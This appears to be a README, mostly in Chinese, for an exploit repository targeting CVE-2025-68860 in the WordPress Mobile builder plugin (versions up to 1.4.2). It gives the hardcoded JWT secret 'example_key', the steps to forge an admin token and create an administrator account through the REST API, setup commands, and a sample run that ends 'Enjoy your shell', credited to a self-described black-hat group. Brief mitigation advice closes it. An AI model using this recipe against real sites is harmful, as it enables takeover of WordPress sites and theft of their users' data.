WordPress Mobile builder 插件 1.4.2 及以下版本存在身份验证失效(Broken Authentication)漏洞,攻击者可利用默认密钥 "example_key" 生成有效的 JWT 令牌,并以管理员身份(user_id=1)进行认证。借助该令牌,攻击者可以创建新的管理员账户并完全控制目标站点。
CVE:CVE-2025-68860
原因:JWT 使用了硬编码密钥 "example_key",且缺乏充分的验证。
漏洞位置:在 Mobile builder 插件中,处理 JWT 认证的文件(例如 class-jwt-auth.php)使用了默认值为 'example_key' 的 JWT_SECRET 常量。该密钥无法通过设置进行修改,因此攻击者可以为任意 user_id 生成令牌。
影响:攻击者可以为 user_id=1(管理员)生成令牌,访问 REST API 端点,并创建具有管理员角色的新用户。
CVSS:高危(评分 8.8)— 攻击向量为网络,无需用户交互。
脚本生成 JWT 令牌,其 payload 包含 user_id: 1 (admin) dan secret "example_key".
令牌用于访问 /wp-json/wp/v2/users/,以验证管理员访问权限。
如果成功,脚本将向 /wp-json/wp/v2/users 发送 POST 请求,以创建新用户:用户名为 dedsec1337,密码为 admin,邮箱为 [email protected],角色为 administrator。
输出将显示凭据和 API 响应。
Python 3.6+
Library: requests, PyJWT, colorama
Target WordPress dengan plugin Mobile builder versi <= 1.4.2 yang aktif.
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║
║ CVE-2025-68860 Priority: HIGH ║
║ Dedsec Team Exploit ║
╚═══════════════════════════════════════════════════════════════════╝
Exploit by : Dedsec Team Exploit
Telegram : @DedsecTeam1337
GitHub : https://github.com/DedsecTeam-BlackHat
[INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication
[INFO] All old exploits/settings are ignored, running this vector only.
Site URL (example: http://target.site): http://localhost/wordpress
[INFO] Generating JWT as admin (user_id=1)...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] Testing JWT at /wp-json/wp/v2/users/me
[SUCCESS] JWT valid! Confirmed admin access.
--------------------------------------------------------------
[INFO] Creating admin account using exploit...
[INFO] Exploiting, please wait...
[SUCCESS] ✅ Admin user created successfully!
==============[ New Admin Credentials ]==============
Username : dedsec1337
Password : admin
Email : [email protected]
===================================================
Full API response:
{
"id": 3,
"username": "dedsec1337",
"name": "dedsec1337",
"email": "[email protected]",
"roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] Exploit finished. Enjoy your shell.
...
攻击者可以创建新的管理员账户,访问 WordPress 的全部功能,安装恶意插件、修改内容、窃取用户数据,或利用该站点发起进一步攻击。
该漏洞可在无需事先认证的情况下被远程利用。
影响:WordPress 站点被完全入侵。
立即将 Mobile builder 插件更新到最新版本(>=1.4.3)。
如果没有可用更新,请暂时禁用该插件。
检查站点中是否存在可疑用户。
使用 Web 应用防火墙(WAF)阻止对 REST API 端点的可疑请求。
作为临时措施,修改插件代码中的密钥(如有可能),并限制对 REST API 的访问。